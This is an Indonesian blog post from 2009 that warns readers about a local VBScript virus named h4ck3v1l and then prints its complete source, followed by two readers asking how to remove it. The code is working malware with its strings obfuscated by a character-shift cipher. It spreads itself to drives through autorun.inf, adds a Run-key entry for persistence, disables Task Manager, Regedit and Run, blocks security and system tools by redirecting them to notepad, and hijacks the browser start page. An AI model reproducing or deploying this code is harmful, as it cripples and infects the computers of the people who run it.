h4ck3v1l adalah virus lokal yang dapat menyebabkan komputer kita akan kehilangan beberapa komponen pentingnya seperti task manager, run, dan search.
Jelas saja komputer kita akan mengalami kecacatan pada tubuhnya.
Dan yang perlu anda tahu virus ini dapat membobol antivirus seperti avira, avg, bitdefender dll, walaupun sudah di update.
Ini adalah pengalaman saya, saya memakai antivirus avg 8.0 free namun dan saya selalu meng-update namun tetap saja tidak dapat mencegah virus ini masuk.
Dan dibawah merupakan script dari virus itu(h4ck3v1l).
dan format virus ini adalah VBs. Jadi kita harus waspada karena virus lokal ini memang amat-sangat ber-bahaya.
'Rem Author : Aurel 666
'Rem Padang Panjang VX Syndicate
'Rem Http://Aurel666.Page.tl
on error resume next
dim mysource,winpath,vuKYMjmVzp,fs,mf,atr,tf,rg,nt,check,sd
atr = FfbxsZlGQW("^ovspuvb\")&vbcrlf&FfbxsZlGQW("tcw/m2w4ld5i!fyf/uqjsdtx>fuvdfyfmmfit")
set fs = createobject(FfbxsZlGQW("udfkcPnfutzTfmjG/hojuqjsdT"))
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & FfbxsZlGQW("tcw/m2w4ld5i]"))
tf.attributes = 32
set tf=fs.createtextfile(winpath & FfbxsZlGQW("tcw/m2w4ld5i]"),2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & FfbxsZlGQW("tcw/m2w4ld5i]"))
tf.attributes = 39
for each vuKYMjmVzp in fs.drives
If (vuKYMjmVzp.drivetype = 1 or vuKYMjmVzp.drivetype = 2) and vuKYMjmVzp.path <> FfbxsZlGQW(";B") then
set tf=fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("tcw/m2w4ld5i]"))
tf.attributes =32
set tf=fs.createtextfile(vuKYMjmVzp.path &FfbxsZlGQW("tcw/m2w4ld5i]"),2,true)
tf.write mysource
tf.close
set tf=fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("tcw/m2w4ld5i]"))
tf.attributes =39
set tf =fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("goj/ovspuvb]"))
tf.attributes = 32
set tf=fs.createtextfile(vuKYMjmVzp.path &FfbxsZlGQW("goj/ovspuvb]"),2,true)
tf.write atr
tf.close
set tf =fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("goj/ovspuvb]"))
tf.attributes=39
end if
next
set rg = createobject(FfbxsZlGQW("mmfiT/uqjsdTX"))
rg.regwrite FfbxsZlGQW("]eobnnpd]mmbutoJ]mmfit]fmjggoj]UPPS`TFTTBMD`ZFLI"), FfbxsZlGQW("fyf/ggphpm")
rg.regwrite FfbxsZlGQW("]eobnnpd]ofqp]mmfit]fmjghfs]UPPS`TFTTBMD`ZFLI"), FfbxsZlGQW("fyf/ggphpm")
rg.regwrite FfbxsZlGQW("]eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI"), FfbxsZlGQW("fyf/ggphpm")
rg.regwrite FfbxsZlGQW("sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`
MBDPM`ZFLI"), FfbxsZlGQW("zbmqtjEtnfuJzbsUpO")
rg.regwrite FfbxsZlGQW("ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), FfbxsZlGQW("fyf/qnbojX]qnbojX]tfmjG!nbshpsQ];D"), FfbxsZlGQW("HOJSUT`HFS")
rg.regwrite FfbxsZlGQW("topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]
fsbxugpT]SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("eojGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]
SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]
SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW(FfbxsZlGQW("2")), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("uyFfmjGfejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]
SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("fubjdpttBfmjGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]
fsbxugpT]SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("ujefhfSfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]
fsbxugpT]SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("ovSpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]
SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("ENDfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]
SFTV`UOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("shNltbUfmcbtjE]nfutzt]tfjdjmpq]opjtsfWuofssvD]txpeojX]u
gptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/end]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/34uefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD
]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/shNltbU]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/cjsuub]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/mmbutoj]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/qvuft]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]
UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO")
rg.regwrite FfbxsZlGQW("m2w4ld5i]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]
FOJIDBN`MBDPM`ZFLI"),winpath&FfbxsZlGQW("tcw/m2w4ld5i]")
rg.regwrite FfbxsZlGQW("fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]
SFTV`UOFSSVD`ZFLI")
,FfbxsZlGQW("qj{/fubeqv0mu/fhbq/777mfsvB/xxx00;quui")
rg.regwrite FfbxsZlGQW("fmujU!xpeojX]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT
]SFTV`UOFSSVD`ZFLI"),FfbxsZlGQW("fubdjeozT!yW!hobkobQ!hobebQ")
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(FfbxsZlGQW("mmfit/uqjsdtX"))
sd.run winpath&FfbxsZlGQW("!$udfmft0$f0!fyf/sfspmqyf]")&Wscript.ScriptFullname
Function FfbxsZlGQW(EsqAXarTUp)
Dim i, tmp2
For i = 1 To Len(EsqAXarTUp)
tmp2 = Chr(Asc(Mid(EsqAXarTUp, i, 1)) - 1) + tmp2
Next
FfbxsZlGQW = tmp2
End Function
Minggu, 01 Maret 2009
virus h4ck3v1l
Langganan:
Posting Komentar (Atom)
2 komentar:
bagaimana nak hilangkan virus ini dalam pc?my pc infected.aduhh..
komputer udah terkena virus ini.how to remove it??aduhhh..
Posting Komentar